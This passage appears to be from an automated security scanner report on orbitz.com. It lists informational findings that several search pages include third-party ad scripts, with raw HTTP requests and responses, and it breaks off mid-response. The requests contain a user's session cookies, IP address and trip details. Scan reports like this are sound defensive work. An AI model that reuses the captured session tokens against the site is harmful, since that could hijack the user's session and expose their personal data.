Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; mbox=session#1317600406536-142286#1317603863|PC#1317600406536-142286.19#1320194003|check#true#1317602063; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; adRotator=true; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598467266:ss=1317596806325; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9

searchType=air&source=quick_search&searchTab=quick_search&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|bos|mia|mm/dd/yy|||||||||mm/dd/yy|mm/dd/yy||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:34:31 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:34:31 GMT; Path=/
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:34:31 GMT
Content-Length: 157657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1
...[SNIP]...
id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=90&width=728&adType=noframe&"></script>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
d" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=225&width=519&adType=noframe&"></script>
...[SNIP]...
<li>
                        <script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=air&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&"></script>
...[SNIP]...
="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=150&width=519&adType=noframe&"></script>
...[SNIP]...
<div class="adColumn">
       <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&"></script>
...[SNIP]...
<div class="adColumn lastColumn">
       <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=225x200&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&"></script>
...[SNIP]...
ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=90&width=728&adType=noframe&"></script>
...[SNIP]...
<div class="thirdPartyLogos">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=55&width=120&"></script>
...[SNIP]...
="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=1&"></script>
...[SNIP]...
="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=2&"></script>
...[SNIP]...
="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=3&"></script>
...[SNIP]...
="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602071974&height=1&width=1&adType=noframe&pos=4&"></script>
...[SNIP]...
20.89. http://www.orbitz.com/App/SubmitQuickSearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /App/SubmitQuickSearch?z=dc61&r=39i HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 640
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=bfe6&r=h
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; mbox=session#1317600406536-142286#1317603930|PC#1317600406536-142286.19#1320194070|check#true#1317602130; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598506468:ss=1317596806325

searchType=airhotel&source=advanced&searchTab=&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=+&previousB
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: PackagingContext=APH; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:35:11 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/04/11|||||||||mm/dd/yy|10/11/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:35:11 GMT; Path=/
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/04/11|||||||||mm/dd/yy|10/11/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:35:11 GMT; Path=/
Date: Mon, 03 Oct 2011 00:35:11 GMT
Content-Length: 3233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Searching for
...[SNIP]...
0x340&origin=BOS&dest=MIA&state=FL&startDate=10-04-2011&endDate=10-11-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602111383&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=airhot&Section=interstitial&adsize=550x340&origin=BOS&dest=MIA&state=FL&startDate=10-04-2011&endDate=10-11-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602111383&"></script>
...[SNIP]...
20.90. http://www.orbitz.com/App/SubmitQuickSearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/SubmitQuickSearch

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /App/SubmitQuickSearch?z=7651&r=6bk HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
Content-Length: 458
Cache-Control: max-age=0
Origin: http://www.orbitz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=dc61&r=39i
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA||||||||MIA|BOS|||||||||||||||||||||||||||||||||||||||||||||advanced|; mbox=session#1317600406536-142286#1317603970|PC#1317600406536-142286.19#1320194110|check#true#1317602170; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598608203:ss=1317596806325

searchType=air&source=quick_search&searchTab=quick_search&dpHidden=&tripLength=7&searchMethodHidden=find&expandTravelers=false&WebLogicSession=6EA6F85923281CCF7F006954C370B1AB&orbotHotelSearchTypeKey=
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|"; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:37:17 GMT; Path=/
Set-Cookie: OrbitzRegistration="N,3,0,0"; Domain=.orbitz.com; Expires=Sun, 28-Sep-2031 00:37:17 GMT; Path=/
Date: Mon, 03 Oct 2011 00:37:16 GMT
Content-Length: 3419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
0x340&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602237378&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=air&Section=interstitial&adsize=550x340&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602237378&"></script>
...[SNIP]...
20.91. http://www.orbitz.com/App/ViewFlightSearchResults  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /App/ViewFlightSearchResults

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /App/ViewFlightSearchResults?retrieveParams=true&z=115e&r=84x&z=115f&r=84y&lastPage=interstitial HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/App/SubmitQuickSearch?z=7651&r=6bk
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; mbox=session#1317600406536-142286#1317603970|PC#1317600406536-142286.19#1320194110|check#true#1317602170; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598608203:ss=1317596806325; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; OrbitzRegistration="N,2,0,0"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|"; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:37:19 GMT
Content-Length: 492180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 T
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=728x90_top&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=90&width=728&adType=noframe&"></script>
...[SNIP]...
<div id="hotwireTop">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=hotwireTop&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&refUrl=http%3A%2F%2Fwww.orbitz.com%2FApp%2FSubmitAPHSearchRequest%3FsearchType=airhotel%2526fromHIARPSModule=true%2526fromAddAPkgTopAd=true&aapd=true&dcity=Miami&"></script>
...[SNIP]...
<div onClick="isSessionTimedOut(event, false, 'msgB');">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=125x125_top&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&refUrl=http%3A%2F%2Fwww.orbitz.com%2FApp%2FSubmitAPHSearchRequest%3FsearchType=airhotel%2526fromHIARPSModule=true%2526fromAddAPkgLeftAd=true&aapd=true&"></script>
...[SNIP]...
<div class="aphXSell">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=125x125_bottom&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&"></script>
...[SNIP]...
t=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=65&width=149&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=air&Section=results&adsize=149x65&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=65&width=149&"></script>
...[SNIP]...
<div class="ad" id="adhotwireBottom">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=hotwireBottom&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=175&width=125&adType=noframe&"></script>
...[SNIP]...
<div class="ad" id="ad160x600">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=160x600&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=600&width=120&adType=noframe&"></script>
...[SNIP]...
<div class="ad" id="ad160x600_right">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=results&adsize=160x600_right&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=600&width=160&adType=noframe&"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://www.google.com/afsonline/show_afs_ads.js"></script>
...[SNIP]...
<div class="thirdPartyLogos">
            <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=air&Section=main&adsize=120x55_footer&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&height=55&width=120&"></script>
...[SNIP]...
&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&pos=top&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=air&Section=results&adsize=1x1&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&pos=top&"></script>
...[SNIP]...
te=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&adType=iframe&pos=middle&"><script language="JavaScript1.1" src="http://www.revresda.com/js.ng/Params.richmedia=yes&channel=air&Section=results&adsize=1x1&origin=BOS&dest=MIA&state=FL&startDate=10-11-2011&endDate=10-24-2011&CookieName=OSC&secure=false&v=50.23.123.106-1472814720.30179680&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317602239694&height=1&width=1&adType=iframe&pos=middle&"></script>
...[SNIP]...
20.92. http://www.orbitz.com/shop/hotelsearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shop/hotelsearch

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=orbitz&grp=9705&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fad.doubleclick.net%2Fclk%3B141652382%3B20702477%3Ba%3Fhttp%3A%2F%2Fwww.orbitz.com%2Fpsi%3Ftype%3Dhotel%26market%3D%24%7Bcity%7D%2C%24%7Bcountryn%7D%26checkin%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm-dd%22%7D%26checkout%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm-dd%22%7D%26guests%3D%24%7Badults%7D%26rooms%3D%24%7Brooms%7D%26WT.mc_id%3Do_igo_merch_city_dated%26WT.mc_ev%3Dclick%26gcid%3DC11287x600-CY%24%7Bcity%7D%2C%24%7Bcountryn%7D&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=153&pos=0&aii=e3898191-1452-431e-82b6-c9f881ca9a4c&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267; adRotator=true; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
